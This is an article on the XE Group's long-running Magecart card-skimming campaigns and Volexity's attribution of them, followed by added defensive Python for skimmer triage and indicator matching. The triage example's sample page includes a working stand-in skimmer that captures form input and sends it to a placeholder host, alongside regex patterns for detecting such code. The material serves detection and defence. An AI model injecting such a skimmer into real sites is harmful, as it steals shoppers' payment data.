The ‘XE Group,’ a relatively obscure gang of Vietnamese hackers, has been tied to financially motivated intrusions and credit card skimming for eight years. The threat actors are believed to steal thousands of credit cards each day, mostly from restaurants, non-profit organizations, art galleries, and travel websites.
The actors compromise externally facing services using publicly available exploits, most notably for vulnerabilities in Telerik UI, and then deploy malware that steals passwords and payment card data. The group’s operations were first detailed in a 2020 Malwarebytes report, but Volexity has now published a more in-depth study of recent breaches attributed to them.
Volexity traced the XE Group’s infrastructure over the past three years and published all of the technical details and indicators of compromise (IOCs) on GitHub. Because the compromised sites all loaded the malicious JavaScript snippet in the same way, the researchers were able to locate a large number of compromised sites carrying the same skimmer.
According to Volexity’s analysis, the code used to load the malicious JavaScript on these sites shows that the attacker employs an unusual technique: the JavaScript keyword “object” is used to populate the domain value, so the hostname is filled in at run time rather than hard-coded.
Attacks of this kind are known as “Magecart” attacks: a threat actor compromises an e-commerce site and injects malicious JavaScript that captures customer and payment details as they are entered into the site’s forms. The stolen data is then sent to a remote server under the attackers’ control, where they collect it.
The long-term success of these campaigns depends on how well the skimmer evades detection by security software on the compromised website. When a sample of this skimmer is uploaded to VirusTotal it scores 0/57, meaning not a single engine flags it, so this group’s JavaScript is currently highly resistant to antivirus detection.
The current skimmer has only minor enhancements over last year’s samples and still captures any data victims type into pages that include the malicious JavaScript. Volexity attributes the XE Group’s activity to Vietnamese threat actors because some of the domains used for command-and-control servers are registered to a person in Vietnam. Although domain registration details can be forged, the researchers were able to link the registrant, Joe Nguyen, to a GitHub repository using an XE avatar created by someone with the same name.
The GitHub account’s handle, “xethanh,” also had an account on the crdclub[.]su forum, where it was used to sell stolen credit card data. Similar accounts were found on other carding communities, such as cybercarders[.]su and cardingforum[.]co, indicating that the actor prefers to sell the cards rather than cash them out directly.
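The injection pattern described above (a script on a checkout page that reads form fields and sends them to a third-party host) is what a defender looks for when triaging a page. The following is an added example, not code from the article or from Volexity; it statically walks the script elements of an HTML document, lists external script hosts that are not on a first-party allowlist, and flags inline scripts that combine input capture with a network send. The sample page, the allowlist and the stand-in skimmer in it are constructed for the demonstration and are not XE Group's real code or infrastructure.

```python
"""Static triage of a page for Magecart-style skimmer indicators.

Added example, not part of the original article or of Volexity's tooling.
The SAMPLE_PAGE, ALLOWED set and the 'skimmer' script inside the page are
constructed stand-ins, not the XE Group's real code or domains.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A skimmer has to read what the user typed ...
CAPTURE_RE = re.compile(
    r"addEventListener\s*\(\s*['\"](?:keyup|keydown|input|change|submit)['\"]"
    r"|\.value\b|FormData\s*\(|querySelectorAll\s*\(\s*['\"]input",
    re.IGNORECASE,
)
# ... and ship it somewhere, by fetch/XHR/beacon or an image/script src.
EXFIL_RE = re.compile(
    r"\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+Image\s*\(|\.src\s*=",
    re.IGNORECASE,
)


class ScriptCollector(HTMLParser):
    """Collects external script src values and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def script_host(src):
    """Hostname of an external script URL; None for same-origin relative paths."""
    if src.startswith("//"):          # protocol-relative URL
        src = "https:" + src
    return urlparse(src).hostname


def triage(html, allowed_hosts):
    """Return (unexpected external hosts, inline scripts that capture and exfiltrate)."""
    p = ScriptCollector()
    p.feed(html)
    unexpected = [h for h in (script_host(s) for s in p.external)
                  if h and h not in allowed_hosts]
    suspicious = [s for s in p.inline if CAPTURE_RE.search(s) and EXFIL_RE.search(s)]
    return unexpected, suspicious


# Constructed sample page: one allowed CDN, one unknown loader host, one benign
# inline script and one inline stand-in skimmer that reads inputs on 'change'
# and leaks them through an image request.
SAMPLE_PAGE = """<html><body>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/vendor.js"></script>
<script>console.log('analytics loaded');</script>
<script src="//static.example-unknown.test/loader.js"></script>
<script>
document.querySelectorAll('input').forEach(function (el) {
  el.addEventListener('change', function () {
    new Image().src = 'https://collect.example-unknown.test/?d=' + encodeURIComponent(el.value);
  });
});
</script>
</body></html>"""

ALLOWED = {"cdn.shop.example"}  # constructed first-party/CDN allowlist

if __name__ == "__main__":
    hosts, scripts = triage(SAMPLE_PAGE, ALLOWED)
    print("unexpected script hosts:", hosts)
    print("suspicious inline scripts:", len(scripts))
```

This is a first pass only. A loader that assembles its hostname at run time, as Volexity describes for this group, never exposes the host in a `src` attribute, so the external-host list will not catch it; the inline heuristic and, better, a Content Security Policy that restricts `script-src` and `connect-src` to known hosts are what catch the runtime-assembled case.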
Volexity explains that “The persona used for the GitHub and carding account, and several of the domains, have a history going back to 2013, which suggests the attacker may have been attempting similar attacks for up to eight years, with only one significant public mention of their activity.”
Finally, some of the malicious files found on VirusTotal appear to have been uploaded from Vietnam. Threat actors commonly submit their malware to VirusTotal before launching a campaign to check how well antivirus products detect it. Defenders can use the published network indicators to block XE Group operations and the accompanying signatures to detect the threat.
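Putting the published network indicators to use means matching them against proxy and DNS telemetry. The following is an added example, not code from the article or from Volexity's GitHub release. Indicator lists are usually distributed defanged (the article itself writes crdclub[.]su), so the matcher refangs each indicator first, then matches an observed hostname exactly or as a subdomain of the indicator, and never as a bare substring, so a look-alike domain that merely contains the indicator does not fire. The indicator list and the log lines below are constructed for the demonstration and are not XE Group's real infrastructure.

```python
"""Match defanged network IOCs against proxy and DNS log lines.

Added example, not part of the original article or of Volexity's published
IOC set. INDICATORS and LOG_LINES are constructed for the demonstration;
the .test domains are placeholders, not real XE Group infrastructure.
"""
import re
from urllib.parse import urlparse


def refang(indicator):
    """Turn a defanged indicator (crdclub[.]su, hxxps://...) into a hostname."""
    s = indicator.strip().lower()
    s = s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    s = re.sub(r"^hxxps?://", lambda m: m.group(0).replace("hxxp", "http"), s)
    if "://" in s:                       # full URL: keep only the host part
        s = urlparse(s).hostname or s
    return s.rstrip(".")


def host_matches(observed, ioc_host):
    """True if observed equals the IOC host or is a subdomain of it."""
    observed = observed.lower().rstrip(".")
    return observed == ioc_host or observed.endswith("." + ioc_host)


# Hostname-looking tokens: something with a dot followed by an alphabetic TLD,
# which deliberately excludes bare IPv4 addresses and timestamps.
HOST_RE = re.compile(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


def extract_hosts(line):
    """Pull hostname-looking tokens from a proxy or DNS log line."""
    return [m.group(1).lower() for m in HOST_RE.finditer(line)]


def scan_logs(lines, indicators):
    """Return (line_number, observed_host, matched_ioc) for every hit."""
    iocs = {refang(i) for i in indicators}
    hits = []
    for n, line in enumerate(lines, 1):
        for host in extract_hosts(line):
            for ioc in iocs:
                if host_matches(host, ioc):
                    hits.append((n, host, ioc))
    return hits


# Constructed indicator list in the defanged style IOC feeds use.
INDICATORS = [
    "collect[.]example-ioc[.]test",
    "hxxps://skimmer-cdn[.]example-ioc[.]test/loader.js",
]

# Constructed log lines: a clean CDN fetch, a DNS query for a subdomain of an
# indicator, a POST to the indicator itself, and a look-alike that only
# contains the indicator as a substring (must not match).
LOG_LINES = [
    "2021-11-08T10:01:12Z proxy user=alice GET https://cdn.shop.example/vendor.js 200",
    "2021-11-08T10:01:13Z dns query=s.collect.example-ioc.test type=A",
    "2021-11-08T10:01:14Z proxy user=alice POST https://collect.example-ioc.test/gate.php 200",
    "2021-11-08T10:02:00Z dns query=example-ioc.test.attacker-lookalike.net type=A",
]

if __name__ == "__main__":
    for n, host, ioc in scan_logs(LOG_LINES, INDICATORS):
        print(f"line {n}: {host} matched IOC {ioc}")
```

Suffix matching on a dot boundary is the important detail: attackers rotate subdomains under the same registered domain, so an exact-match list goes stale quickly, while naive substring matching produces false positives on unrelated domains that happen to embed the indicator.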